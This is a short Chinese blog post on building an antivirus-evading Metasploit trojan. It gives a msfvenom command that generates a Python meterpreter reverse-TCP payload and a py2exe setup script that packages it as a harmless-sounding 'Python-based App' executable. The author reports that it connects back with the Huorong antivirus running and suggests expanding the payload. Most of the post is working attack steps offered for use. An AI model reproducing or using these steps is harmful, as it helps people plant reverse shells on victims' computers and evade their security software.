天道酬勤

Metasploit免杀马

前言

经测试,基于python的免杀工具,只是能起到一个反弹shell的功能,当然拿到shell了,其实也就足够了。

准备

利用msfvenom生成马

msfvenom -p python/meterpreter/reverse_tcp LHOST=监听IP LPORT=监听端口 -f raw -o hackergu.py

准备python脚本

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['hackergu.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

运行脚本

python2 setup.py py2exe

生成一个exe文件

 

在开启火绒情况下,成功上线

 

后续

这里将其命令框写入内存运行完全是ok的,但是我没有再多去研究,可以扩展生成的payload,使其发挥更大的效果。

 

赞(1) 打赏
未经允许不得转载:HackerGu‘s Blog » Metasploit免杀马
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏